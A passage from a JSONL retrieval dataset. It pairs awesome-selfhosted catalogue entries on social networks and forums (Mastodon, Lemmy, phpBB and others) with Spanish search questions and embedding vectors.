-0.0443, 0.01899, -0.06317, -0.0088, -0.03611, -0.06288, 0.04652, 0.04898, 0.00077, -0.04916, 0.02184, -0.0317, -0.04048, 0.05436, 0.07126, 0.01257, -0.04028, 0.05538, 0.06345, -0.00726, -0.00148, 0.06994, -0.03683, 0.03346, -0.02804, -0.01814, 0.03367, 0.05421, 0.02469, -0.0414, 0.01024, 0.01918, 0.04761, 0.00543, 0.03705, 0.03889, -0.05815, 0.02122, -0.02286, 0.01404, 0.04358, 0.02716, 0.05556, 0.00275, -0.08159, -0.00916, -0.01665, 0.01286, -0.03295, -0.07341, 0.00817, -0.03618, 0.03091, 0.01796, -0.01729, -0.00707, 0.01496, 0.03778, -0.05729, 0.09203, 0.01559]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Isso β€” Lightweight commenting server written in Python and Javascript. It aims to be a drop-in replacement for Disqus [MIT, Python/Docker]. Lemmy β€” Link aggregator for the fediverse (alternative to Reddit) [AGPL-3.0, Docker/Rust]. Loomio β€” Collaborative decision-making tool that makes it easy for anyone to participate in decisions which affect them [AGPL-3.0, Docker]. Mastodon β€” Federated microblogging server [AGPL-3.0, Ruby]. Misago β€” Fully featured modern forum application that is fast, scalable and responsive [GPL-2.0, Docker]. Misskey β€” Decentralized app-like microblogging server/SNS for the Fediverse, using the ActivityPub protocol like GNU social and Mastodon [AGPL-3.0, Nodejs/Docker]. Movim β€” Modern, federated social network based on XMPP, with a fully featured group-chat, subscriptions and microblogging [AGPL-3.0, PHP/Docker]. MyBB β€” Free, extensible forum software package [LGPL-3.0, PHP]. NodeBB β€” Forum software built for the modern web [GPL-3.0, Nodejs/Docker].", "indexar": "cual es una herramienta libre para decidir cosas de forma colaborativa en grupo?", "v": [0.06446, 0.09231, -0.17529, -0.04494, 0.00499, -0.14054, -0.00788, 0.00593, -0.04091, -0.16144, -0.01437, -0.10531, -0.04984, -0.05679, 0.12104, 0.00066, 0.1331, -0.09223, 0.00345, -0.01526, -0.01725, -0.00626, -0.05878, -0.04729, 0.01231, -0.17087, 0.04544, 0.00975, -0.09748, 0.10623, 0.08817, -0.02831, 0.04481, -0.08533, 0.03411, -0.07172, 0.01228, 0.01338, 0.03137, -0.00136, -0.12263, 0.0049, -0.10545, 0.03609, 0.047, 0.06372, -0.12606, 0.00124, -0.03517, 0.11665, 0.01527, -0.04868, -0.06791, -0.00507, -0.00511, -0.11858, 0.21479, -0.15206, -0.01107, -0.07684, -0.16936, 0.02211, -0.05818, -0.05283, -0.03127, 0.04938, -0.01718, -0.03769, -0.02199, 0.14064, 0.0765, -0.07201, 0.00792, -0.06594, 0.0038, 0.03705, 0.05798, 0.02103, 0.05839, -0.00724, 0.20746, -0.00583, 0.02189, 0.00803, 0.01742, -0.12036, 0.13508, -0.05085, 0.03365, -0.03139, -0.0256, 0.04886, -0.01148, 0.05583, 0.02238, -0.03375, 0.03296, 0.09669, 0.02056, 0.01659, 0.14224, -0.06855, -0.13398, 0.00399, -0.03179, 0.06307, -0.10144, 0.04495, -0.05461, 0.00317, 0.10481, 0.0722, 0.0521, -0.00902, 0.02818, -0.01782, -0.01219, 0.00402, -0.02991, -0.03814, 0.09745, 0.01068, -0.06092, -0.08176, 0.08671, 0.0254, 0.01021, 0.09691, -0.03, -0.0475, -0.01831, 0.07333, -0.04215, 0.04591, -0.04057, -0.03785, 0.03113, -0.02533, 0.03387, -0.08581, 0.02646, 0.01537, 0.01044, -0.11822, 0.04967, -0.02631, 0.00511, 0.0145, 0.02757, 0.07487, 0.01152, 0.00532, -0.01654, 0.03441, -0.0597, 0.02714, -0.04592, -0.02009, -0.04288, 0.03891, -0.02995, -0.05051, 0.04985, -0.02491, -0.02349, -0.05517, -0.00149, -0.00216, 0.02219, 0.02637, 0.04518, -0.03827, 0.07553, -0.0622, 0.03356, -0.09993, -0.12618, -0.0181, 0.03517, -0.09009, 0.0193, 0.0319, -0.03673, -0.03838, 0.00848, -0.00358, 0.00863, 0.02317, 0.02168, 0.01323, -0.03114, 0.0525, -0.00896, -0.08375, 0.03261, -0.00993, 0.04157, -0.07939, 0.05417, -0.02691, -0.02104, -0.03182, 0.01036, 0.00431, -0.02217, 0.02798, -0.03905, 0.0319, 0.06869, 0.08312, 0.07614, -0.00906, 0.05232, 0.01955, -0.06025, 0.00864, -0.02418, -0.00918, -0.05104, 0.0612, 0.00634, 0.03535, 0.11859, -0.06907, 0.05188, 0.07142, 0.05077, 0.03965, -0.003, -0.00165, 0.02969, -0.05233, 0.01961, -0.06244, 0.06054, -0.0237, 0.08392, 0.01664, -0.06105, -0.00449, 0.05239, 0.06667, -0.02454, -0.04526, -0.02875, -0.08014, -0.06217, -0.00462, -0.05282, -0.10107, -0.05371, 0.0373, 0.05513, -0.0656, 0.06701, -0.0139]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Isso β€” Lightweight commenting server written in Python and Javascript. It aims to be a drop-in replacement for Disqus [MIT, Python/Docker]. Lemmy β€” Link aggregator for the fediverse (alternative to Reddit) [AGPL-3.0, Docker/Rust]. Loomio β€” Collaborative decision-making tool that makes it easy for anyone to participate in decisions which affect them [AGPL-3.0, Docker]. Mastodon β€” Federated microblogging server [AGPL-3.0, Ruby]. Misago β€” Fully featured modern forum application that is fast, scalable and responsive [GPL-2.0, Docker]. Misskey β€” Decentralized app-like microblogging server/SNS for the Fediverse, using the ActivityPub protocol like GNU social and Mastodon [AGPL-3.0, Nodejs/Docker]. Movim β€” Modern, federated social network based on XMPP, with a fully featured group-chat, subscriptions and microblogging [AGPL-3.0, PHP/Docker]. MyBB β€” Free, extensible forum software package [LGPL-3.0, PHP]. NodeBB β€” Forum software built for the modern web [GPL-3.0, Nodejs/Docker].", "indexar": "con que puedo montar un servidor de microblogging federado similar a Twitter?", "v": [-0.0829, 0.01746, -0.1395, -0.08745, -0.12726, -0.03722, -0.12856, -0.02965, -0.0384, -0.1027, -0.05505, -0.01305, 0.09429, -0.05604, 0.08864, 0.02243, 0.14015, -0.15147, 0.1946, -0.08025, 0.0787, 0.01728, 0.08901, -0.14444, 0.02227, -0.06184, -0.01123, -0.05116, -0.10869, -0.02826, 0.08856, 0.02189, 0.05524, 0.07698, 0.0183, 0.03705, 0.02209, 0.16213, -0.09816, -0.01175, -0.07125, -0.08727, -0.11415, -0.03205, -0.02885, -0.04602, -0.02904, -0.16545, 0.03141, 0.04058, 0.06224, -0.0938, -0.09351, 0.10203, -0.11503, 0.05624, 0.11396, -0.19906, -0.03026, -0.0285, -0.09749, 0.05509, 0.00267, -0.02883, 0.01207, 0.01104, -0.08229, 0.03573, -0.06903, 0.0175, -0.02393, -0.04634, -0.03196, -0.10031, -0.01131, 0.2022, 8e-05, 0.05097, 0.14621, 0.12292, -0.09286, 0.004, -0.04298, 0.11024, -0.02164, -0.03089, 0.02986, -0.04238, 0.04125, 0.02113, -0.01016, 0.07957, -0.09927, -0.05554, -0.0533, -0.05463, 0.02357, 0.00299, 0.04573, -0.03331, -0.04406, 0.11683, -0.01352, 0.01734, -0.00432, 0.04634, 0.06684, -0.07668, 0.0396, -0.13221, 0.11726, 0.01668, -0.06333, 0.02374, -0.05, -0.04104, -0.05878, -0.01724, 0.092, 0.0508, -0.02842, 0.02222, 0.01979, -0.00655, -0.02114, -0.05131, 0.02546, 0.05603, 0.02987, -0.00638, -0.03552, 0.00046, -0.03459, -0.02037, -0.01646, 0.04545, 0.02991, -0.01535, -0.08683, -0.06027, 0.01948, -0.00854, -0.05092, -0.09035, 0.1014, -0.00663, 0.06878, -0.13496, -0.04551, 0.05537, 0.02073, 0.04771, -0.0484, -0.02655, -0.07742, 0.01105, 0.00822, -0.05227, 0.00037, 0.04909, -0.05622, 0.00978, 0.0484, -0.01229, 0.04371, 0.04897, 0.00012, -0.00135, 0.02424, -0.00086, -0.10823, 0.10329, -0.00923, -0.00431, 0.06544, 0.02691, -0.05138, -0.02949, 0.02806, 0.07841, -0.07453, 0.00397, -0.02848, 0.01233, -0.01865, 0.0064, 0.06591, 0.0245, 0.00537, 0.02611, 0.07207, -0.07653, 0.00653, 0.08586, 0.09762, -0.02238, -0.01903, -0.0154, -0.01058, -0.07219, -0.01373, -0.02783, -0.02791, 0.03102, -0.04162, -0.05848, -0.10265, 0.01769, 0.01623, 0.06416, 0.00176, -0.02771, 0.04124, -0.04051, 0.02195, 0.03062, 0.07947, -0.0139, 0.00099, -0.03131, 0.03012, 0.01355, 0.06893, 0.0334, -0.00013, 0.02739, -0.06608, -0.01253, 0.04994, -0.01629, -0.04116, -0.02537, -0.0334, 0.00459, -0.0201, -0.02307, 0.03144, -0.00981, -0.05645, -0.00843, -0.00569, 0.04672, 0.0561, -0.02174, 0.00661, -0.05906, -0.0085, -0.0063, -0.03151, -0.06741, 0.0442, -0.02012, 0.04762, -0.04401, 0.00813, -0.00589]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: OSSN β€” Social networking software that allows you to make a social networking website and helps your members build social relationships, with people who share similar professional or personal interests [CAL-1.0, PHP]. phpBB β€” Flat-forum bulletin board software solution that can be used to stay in touch with a group of people or can power your entire website [GPL-2.0, PHP]. PieFed β€” A link aggregator / reddit clone for the fediverse (alternative to Reddit) [AGPL-3.0, Python/Docker]. PixelFed β€” Ethical photo sharing platform, powered by ActivityPub federation (alternative to Instagram) [AGPL-3.0, PHP]. Pleroma β€” Federated microblogging server, Mastodon, GNU social, & ActivityPub compatible [AGPL-3.0, Elixir]. qpixel β€” Q&A-based community knowledge-sharing software [AGPL-3.0, Ruby]. Redlib β€” An alternative private front-end to Reddit, with its origins in Libreddit [⚠, AGPL-3.0, Rust].", "indexar": "que programa puedo usar para montar una red social donde mis miembros compartan intereses profesionales o personales?", "v": [-0.0615, 0.08944, -0.09531, -0.25434, -0.06739, -0.08341, -0.02237, -0.09829, -0.24358, -0.15753, -0.01335, -0.01094, 0.11368, -0.11995, 0.08165, -0.01956, 0.071, 0.0187, 0.14988, 0.00924, -0.03361, -0.09252, -0.04688, -0.08084, -0.03257, 0.04594, 0.09697, -0.12985, -0.02004, 0.11187, 0.07202, 0.0077, -0.02136, -0.03256, 0.00502, -0.05156, 0.02517, -0.05521, 0.0028, 0.09245, 0.02535, -0.06497, -0.0439, -0.01328, 0.10037, 0.11609, -0.14492, 0.00757, -0.09258, 0.04163, 0.0197, 0.0296, -0.03627, -0.04596, -0.0009, -0.17144, 0.0412, -0.09082, -0.08675, 0.05416, -0.0201, 0.09739, 0.03035, 0.14151, 0.03625, -0.04198, 0.04258, 0.03833, -0.07362, 0.00446, -0.05027, 0.00328, -0.04907, -0.0115, 0.00775, 0.08659, 0.02407, -0.02396, 0.03292, 0.00931, -0.0348, 0.02569, 0.0031, 0.13715, -0.04148, -0.02526, 0.14418, -0.07756, 0.04027, -0.05626, 0.12109, 0.02771, 0.02174, -0.09501, 0.00078, -0.02528, 0.07221, 0.12408, 0.00225, 0.04129, 0.02379, -0.02333, -0.08054, 0.09956, -0.0488, 0.02514, 0.02124, -0.00669, 0.05312, -0.02004, 0.01582, 0.01121, -0.06978, -0.00014, -0.07536, -0.02384, -0.09169, 0.04651, 0.02531, -0.07402, -0.05139, 0.03358, 0.01877, -0.02412, 0.12444, -0.01366, 0.01249, 0.13076, -0.09928, 0.0807, -0.05626, 0.02609, -0.03522, -0.09252, -0.03857, -0.04526, -0.0881, -0.08552, 0.00368, -0.09505, 0.01079, 0.02658, -0.09214, -0.13116, 0.03125, 0.02109, -0.00205, -0.12859, 0.04216, 0.05108, 0.00668, 0.10584, 0.00838, 0.04126, -0.09574, 0.0045, 0.04776, 0.01076, 0.03938, 0.0127, -0.01209, -0.00771, 0.01126, -0.02158, 0.04311, 0.00515, -0.00184, 0.01245, 0.08965, 0.02508, -0.00459, 0.05068, 0.0229, -0.04337, 0.08995, -0.00867, -0.03392, -0.06876, 0.04294, -0.01618, -0.06095, 0.04525, 0.04325, -0.04237, -0.00541, -0.01137, -0.03459, 0.02326, -0.01169, 0.01682, -0.10216, -0.0524, 0.04689, 0.05032, 0.02936, -0.00434, -0.00168, -0.02877, 0.04065, -0.07298, -0.00588, 0.01509, -0.0554, 0.0436, 0.04156, 0.03072, 0.00151, 0.01948, 0.03211, 0.1198, -0.00058, -0.07048, 0.0517, 0.01278, -0.01266, -0.00336, 0.07333, -0.02167, 0.00348, 0.03554, -0.00753, 0.03594, 0.05496, 0.06606, 8e-05, -0.01476, 0.00246, -0.00077, 0.02509, 0.0151, -0.00435, -0.00536, -0.0299, -0.0232, 0.05818, -0.01166, 0.03387, 0.03711, -0.01097, -0.04736, -0.00142, 0.08572, 0.03972, -0.03394, -0.02254, -0.00329, -0.07732, 0.07478, 0.04968, -0.03817, -0.03091, 0.05949, 0.01533, -0.05013, 0.01263, 0.03488]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: OSSN β€” Social networking software that allows you to make a social networking website and helps your members build social relationships, with people who share similar professional or personal interests [CAL-1.0, PHP]. phpBB β€” Flat-forum bulletin board software solution that can be used to stay in touch with a group of people or can power your entire website [GPL-2.0, PHP]. PieFed β€” A link aggregator / reddit clone for the fediverse (alternative to Reddit) [AGPL-3.0, Python/Docker]. PixelFed β€” Ethical photo sharing platform, powered by ActivityPub federation (alternative to Instagram) [AGPL-3.0, PHP]. Pleroma β€” Federated microblogging server, Mastodon, GNU social, & ActivityPub compatible [AGPL-3.0, Elixir]. qpixel β€” Q&A-based community knowledge-sharing software [AGPL-3.0, Ruby]. Redlib β€” An alternative private front-end to Reddit, with its origins in Libreddit [⚠, AGPL-3.0, Rust].", "indexar": "con quΓ© herramienta puedo crear un foro plano para mantener el contacto con un grupo de personas?", "v": [-0.0275, 0.19738, -0.15007, -0.14053, -0.01515, -0.14467, -0.02197, 0.02023, -0.07073, -0.17894, -0.10559, -0.00138, 0.08563, -0.03331, 0.07173, 0.05458, 0.10632, -0.06451, -0.00728, 0.00115, -0.08706, 0.02224, -0.06502, -0.06012, -0.10245, -0.15419, 0.091, -0.04253, -0.08659, 0.13404, 0.04189, -0.01143, 0.0054, 0.01021, 0.03183, -0.09343, 0.06369, 0.10586, 0.05866, 0.04488, -0.19386, 0.03116, -0.06885, 0.03688, -0.00167, 0.0639, -0.08694, -0.00067, -0.03374, 0.10806, 0.00102, -0.04737, -0.10681, -0.00815, -0.03332, -0.17787, 0.1248, -0.14002, 0.01657, -0.05695, -0.15712, -0.00079, 0.00366, 0.02895, -0.0635, 0.01176, 0.0641, -0.02218, -0.09398, 0.0411, -0.05268, -0.14767, 0.00862, -0.05293, 0.08564, -0.0075, 0.11281, 0.02309, -0.09958, -0.03036, 0.03617, 0.02108, -0.03579, -0.04204, -0.08586, -0.09852, 0.04566, 0.0958, -0.07624, -0.06869, -0.00624, -0.0069, 0.01107, -0.04326, 0.0076, 0.00483, 0.01544, 0.06539, -0.08642, -0.01828, 0.11873, -0.04681, -0.12719, 0.08283, -0.05907, -0.00829, 0.02539, 0.05842, -0.06277, 0.07605, 0.05647, -0.0292, 0.02733, 0.01997, 0.01488, 0.0564, -0.04784, 0.0046, 0.04654, -0.05137, 0.00414, 0.06216, -0.09207, -0.02609, 0.04421, 0.00459, -0.01394, 0.11014, -0.04835, 0.03396, -0.03582, -0.02393, -0.03055, -0.03291, -0.00307, 0.05716, -0.02387, -0.01369, 0.01374, -0.05274, 0.00843, 0.06622, -0.07159, -0.15624, -0.02924, -0.07603, -0.05448, -0.01215, 0.01476, 0.02177, -0.01848, 0.00847, 0.02265, 0.03753, -0.10152, 0.01884, -0.02847, -0.0034, 0.00422, 0.00758, -0.0416, -0.03291, 0.07343, 0.01473, 0.02136, -0.04379, -0.00534, -0.02892, 0.07297, 0.04096, 0.0377, -0.01723, 0.14197, -0.0676, 0.03497, -0.02407, -0.03127, -0.03854, -0.02395, -0.02394, -0.00546, -0.00921, -0.02881, 0.00762, -0.0009, -0.06362, 0.03845, 0.03999, 0.04619, 0.10328, -0.07545, 0.05334, 0.01101, -0.03562, -0.00244, -0.04066, 0.00577, -0.0308, 0.00912, -0.06181, -0.00355, -0.0056, 0.02704, 0.00737, -0.02852, 0.00641, -0.04032, -0.03292, 0.06374, 0.05435, 0.11125, -0.0276, 0.06671, -0.01412, -0.02699, 0.06021, 0.01661, -0.01344, 0.05524, 0.08062, 0.01762, 0.05334, 0.06855, 0.01187, 0.00939, 0.04064, -0.01904, -0.01047, -0.01558, 0.05666, 0.00427, -0.02401, 0.04168, -0.07472, 0.07741, 0.03821, 0.0666, -0.01183, -0.01349, 0.03238, 0.00299, 0.05691, -0.01305, -0.03272, -0.04922, -0.05298, 0.01872, 0.02817, -0.07743, -0.1223, 0.00321, 0.03432, 0.06201, -0.04559, 0.05715, -0.01898]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: OSSN β€” Social networking software that allows you to make a social networking website and helps your members build social relationships, with people who share similar professional or personal interests [CAL-1.0, PHP]. phpBB β€” Flat-forum bulletin board software solution that can be used to stay in touch with a group of people or can power your entire website [GPL-2.0, PHP]. PieFed β€” A link aggregator / reddit clone for the fediverse (alternative to Reddit) [AGPL-3.0, Python/Docker]. PixelFed β€” Ethical photo sharing platform, powered by ActivityPub federation (alternative to Instagram) [AGPL-3.0, PHP]. Pleroma β€” Federated microblogging server, Mastodon, GNU social, & ActivityPub compatible [AGPL-3.0, Elixir]. qpixel β€” Q&A-based community knowledge-sharing software [AGPL-3.0, Ruby]. Redlib β€” An alternative private front-end to Reddit, with its origins in Libreddit [⚠, AGPL-3.0, Rust].", "indexar": "cual es una alternativa libre a reddit para agregar enlaces y compartir contenido en la fediverse?", "v": [0.00109, 0.12933, -0.11358, -0.02916, 0.05641, 0.03521, -0.01214, -0.08368, -0.09166, -0.21287, -0.09971, -0.2312, -0.16834, -0.0772, 0.17346, 0.01728, 0.09411, -0.07545, 0.12354, -0.08957, 0.01405, -0.01585, -0.16088, -0.15634, -0.03241, -0.12869, 0.12431, 0.04405, -0.02227, -0.04773, 0.0296, -0.05105, 0.0358, 0.08027, -0.08727, 0.00076, 0.16372, 0.0914, 0.01319, -0.11757, -0.04164, 0.05207, -0.13643, 0.0206, -0.14389, -0.04504, -0.06637, 0.06172, 0.06081, 0.03817, -0.00787, -0.01381, -0.14056, -0.02871, -0.06036, 0.00866, 0.16086, -0.11749, -0.04379, 0.11067, -0.07705, 0.07429, -0.00958, -0.07126, -0.06508, -0.03793, -0.0707, 0.06149, -0.09218, 0.12348, -0.01092, -0.05223, -0.04645, -0.02632, -0.11051, 0.12847, -0.00908, -0.05909, -0.08658, 0.06544, -0.0094, -0.08065, 0.06024, 0.10858, 0.03756, -0.0535, 0.03549, -0.10738, -0.00523, -0.01811, 0.03992, 0.05872, -0.00519, 0.00234, -0.0357, -0.07755, 0.04204, 0.04308, 0.00874, 0.05223, 0.06112, 0.02866, -0.01361, 0.00559, -0.00399, -0.01077, -0.01211, -0.01275, 0.00908, 0.0264, 0.10253, 0.00208, 0.01323, -0.00018, -0.01669, -0.02, -0.0527, -0.00266, 0.03232, -0.01434, -0.00569, -0.02911, -0.05516, -0.06446, -0.03374, 0.03691, 0.03602, 0.06221, -0.02708, 0.03657, -0.00656, -0.01919, -0.04113, -0.13827, -0.08433, -0.03655, 0.09905, -0.01498, 0.01374, -0.0803, 0.0149, 0.02008, 0.01254, -0.0607, 0.01716, -0.03181, 0.02096, -0.07248, -0.05921, 0.01262, -0.09458, 0.01448, -0.08519, 0.04966, -0.03005, -0.01279, -0.04023, 0.00024, -0.05685, 0.05818, 0.04925, 0.013, 0.00932, -0.03153, -0.00763, 0.02884, -0.01471, -0.00065, -0.05371, -0.05138, 0.00743, 0.08604, -0.02238, -0.07816, 0.04399, -0.06447, -0.03225, -0.08112, -0.0024, -0.01211, -0.03518, -0.03873, -0.06541, 0.04689, -0.02743, -0.06315, 0.00534, 0.02933, -0.03169, 0.03965, -0.04103, -0.01523, -0.01507, -0.03782, 0.04259, -0.0029, -0.00474, -0.09087, 0.02337, 0.00066, -0.0457, -0.05343, 0.06398, -0.04586, -0.01375, -0.00554, -0.06269, 0.00861, -0.00489, 0.01785, 0.00872, -0.03359, 0.05246, -0.00985, -0.05431, 0.01454, 0.04493, -0.01616, -0.00403, 0.01953, 0.04641, 0.02827, -0.00957, -0.05792, 0.03454, 0.02772, 0.02287, 0.0678, 0.00028, 0.03406, -0.01776, -0.01483, -0.01936, -0.01768, 0.03266, 0.00751, -0.01184, 0.0622, -0.0164, -0.02586, 0.01247, 0.04629, -0.00121, -0.03621, 0.00701, -0.01099, -0.10162, 0.02839, -0.04141, -0.1112, -0.02502, 0.0283, 0.0209, -0.04905, 0.03775, -0.00495]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: remark42 β€” Lightweight and simple comment engine, which doesn't spy on users. It can be embedded into blogs, articles or any other place where readers add comments [MIT, Docker/Go]. Scoold β€” Stack Overflow in a JAR. An enterprise-ready Q&A platform with full-text search, SAML, LDAP integration and social login support [Apache-2.0, Java/Docker/K8S]. Simple Machines Forum β€” Free, professional grade software package that allows you to set up your own online community within minutes [BSD-3-Clause, PHP]. Socialhome β€” Federated and decentralized profile builder and social network engine [AGPL-3.0, Docker/Python]. Talkyard β€” Create a community, where your users can suggest ideas and get questions answered. And have friendly open-ended discussions and chat (Slack/StackOverflow/Discourse/Reddit/Disqus hybrid) [AGPL-3.0, Docker/Scala]. yarn.social β€” Self-Hosted, Twitterβ„’-like Decentralised micro-logging platform. No ads, no tracking, your content, your data [MIT, Go].", "indexar": "que programa es para crear una comunidad online con foros y debates abiertos?", "v": [0.16172, 0.07597, -0.0354, -0.14578, 0.02769, -0.12164, 0.01699, -0.01264, -0.02789, -0.13038, -0.08661, -0.03119, -0.00417, -0.06306, -0.00541, 0.02746, 0.10468, -0.07236, 0.05302, 0.05733, -0.06062, 0.06969, 0.0002, -0.05027, 0.04142, -0.16463, -0.00948, -0.12044, 0.07204, 0.11754, 0.05896, 0.02788, -0.01744, 0.0713, 0.06908, -0.11058, 0.10799, 0.03018, 0.04966, 0.0537, -0.05176, 0.07583, -0.06611, 0.06219, 0.01152, 0.03352, -0.02883, -0.05632, -0.01914, -0.03205, -0.01151, -0.09717, 0.03883, 0.01351, 0.10625, -0.11498, 0.02875, -0.16645, -0.02663, -0.04052, -0.13984, -0.0352, 0.09211, -0.13694, -0.0155, -0.03896, 0.07849, 0.04759, -0.06355, 0.17191, -0.08205, -0.06183, -0.03336, -0.08903, -0.02085, 0.01973, -0.03107, -0.04074, -0.0625, -0.00317, 0.01184, -0.01373, 0.17142, 0.08569, -0.08444, -0.11028, -0.03537, -0.01614, -0.05366, 0.04217, 0.01768, 0.07099, 0.04591, 0.03169, 0.05579, -0.10771, 0.05794, 0.0695, 0.01201, 0.07799, -0.04627, 0.00276, -0.08236, 0.01966, -0.09097, 0.01063, 0.07476, -0.08223, 0.00607, 0.06589, 0.12446, 0.01446, 0.07942, -0.0525, -0.0093, -0.01007, -0.0188, 0.08231, 0.06568, 0.02747, -0.01946, 0.03856, -0.05678, -0.03369, 0.06105, 0.02499, -0.00613, 0.01513, -0.06822, 0.09948, -0.03076, -0.0025, -0.0417, -0.03696, -0.04899, -0.05225, 0.00473, -0.02997, -0.00607, -0.04906, 0.02516, 0.09009, -0.02731, -0.10641, 0.01422, -0.10978, -0.07774, -0.12104, -0.01821, -0.02989, 0.04854, 0.01726, 0.03129, 0.0127, -0.10075, -0.00462, -0.02986, -0.01613, -0.02578, 0.03868, -0.03788, -0.02101, 0.07504, -0.1669, 0.06721, 0.00667, -0.05482, -0.0044, 0.11002, -0.02467, 0.00708, 0.06216, 0.04466, -0.08543, 0.04971, 0.02784, -0.04468, -0.12702, -0.03182, -0.0829, -0.08388, -0.03425, -0.01543, 0.04821, -0.11945, -0.02571, 0.06399, 0.0084, 0.00226, 0.0648, -0.00325, -0.04784, -0.03674, 0.08053, -0.00056, -0.03892, 0.03995, -0.06452, 0.00403, -0.02925, -0.09025, 0.04621, 0.03256, -0.00522, -0.06486, 0.06493, 0.02682, -0.04679, 0.06617, 0.09991, 0.01533, -0.07869, 0.03045, -0.00014, -0.02698, -0.0196, 0.0341, -0.03316, 0.05141, -0.00388, -0.00519, 0.01637, 0.01475, 0.01096, 0.05127, -0.01936, 0.03258, 0.01737, 0.02931, -0.02605, 0.02978, -0.11068, -0.02305, -0.05834, 0.0103, 0.05372, 0.03735, 0.01272, -0.02307, -0.00881, -0.05461, 0.02939, -0.01216, -0.07299, -0.02369, -0.02273, -0.06188, 0.01744, -0.04616, -0.06514, -0.07027, 0.0214, 0.00681, -0.07543, 0.05967, 0.04737]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: remark42 β€” Lightweight and simple comment engine, which doesn't spy on users. It can be embedded into blogs, articles or any other place where readers add comments [MIT, Docker/Go]. Scoold β€” Stack Overflow in a JAR. An enterprise-ready Q&A platform with full-text search, SAML, LDAP integration and social login support [Apache-2.0, Java/Docker/K8S]. Simple Machines Forum β€” Free, professional grade software package that allows you to set up your own online community within minutes [BSD-3-Clause, PHP]. Socialhome β€” Federated and decentralized profile builder and social network engine [AGPL-3.0, Docker/Python]. Talkyard β€” Create a community, where your users can suggest ideas and get questions answered. And have friendly open-ended discussions and chat (Slack/StackOverflow/Discourse/Reddit/Disqus hybrid) [AGPL-3.0, Docker/Scala]. yarn.social β€” Self-Hosted, Twitterβ„’-like Decentralised micro-logging platform. No ads, no tracking, your content, your data [MIT, Go].", "indexar": "cual es la alternativa libre a Twitter o Reddit para compartir contenido sin publicidad ni seguimiento?", "v": [-0.09843, 0.09192, -0.09257, -0.1127, 0.00781, -0.06012, -0.1398, -0.04818, 0.0126, -0.04316, -0.05757, -0.23494, 0.04247, -0.07954, 0.03447, -0.0613, 0.00473, 0.00779, 0.23281, -0.121, 0.07735, -0.02021, -0.07, -0.10125, 0.0568, -0.09303, 0.06055, 0.02239, -0.02779, 0.0656, -0.00102, -0.08477, 0.03654, 0.04983, -0.16392, 0.07729, 0.16499, 0.13891, 0.03271, -0.01815, 0.01973, 0.00971, -0.05417, 0.10495, -0.05088, -0.05814, -0.15066, 0.00314, -0.05135, -0.0238, 0.02964, 0.00223, -0.1614, 0.05335, 0.07708, 0.05726, 0.15564, -0.20163, -0.09226, 0.0147, -0.0103, 0.04333, 0.01131, -0.04312, -0.08965, 0.02518, -0.00932, 0.04341, -0.03055, 0.11447, 0.06929, -0.01913, -0.00603, -0.04229, 0.01607, 0.11682, -0.08657, -0.00934, -0.04664, 0.04202, 0.00458, -0.06715, 0.12177, 0.07575, 0.01497, -0.06915, 0.03391, -0.12053, -0.04832, -0.00652, 0.01394, 0.01641, -0.0764, -0.00167, -0.03267, -0.04118, 0.02529, -0.01931, 0.0589, 0.02809, -0.01372, 0.00892, -0.08936, -0.13412, -0.01126, 0.06893, -0.0599, -0.10262, -0.03284, -0.03735, 0.12728, -0.05238, -0.04287, 0.00945, -0.02, 0.07563, -0.09673, 0.03451, 0.05275, -0.03002, 0.01146, 0.04815, -0.07657, -0.03202, 0.00636, 0.03942, -0.05316, 0.04115, 0.00172, -0.02412, 0.02689, -0.08363, 0.02067, -0.05551, -0.10116, -0.02646, 0.02916, 0.04421, -0.07783, -0.04496, 0.03343, -0.05424, -0.03753, -0.08324, 0.02805, -0.05395, 0.05743, -0.15798, 0.01478, 0.07437, -0.12507, -0.0311, -0.00359, 0.00829, 0.02395, 0.00016, -0.01759, 0.01294, -0.05554, 0.04545, -0.05271, -0.07353, 0.03929, -0.00224, 0.04803, 0.06842, -0.03601, -0.03797, -0.01067, 0.01885, -0.03569, 0.06642, 0.04708, -0.09726, 0.04641, -0.08491, -0.01975, -0.0562, -0.01612, -0.00346, -0.06517, 0.00083, -0.02894, 0.02625, 0.04675, -0.03277, -0.00618, -0.00685, -0.0408, 0.08685, 0.00689, 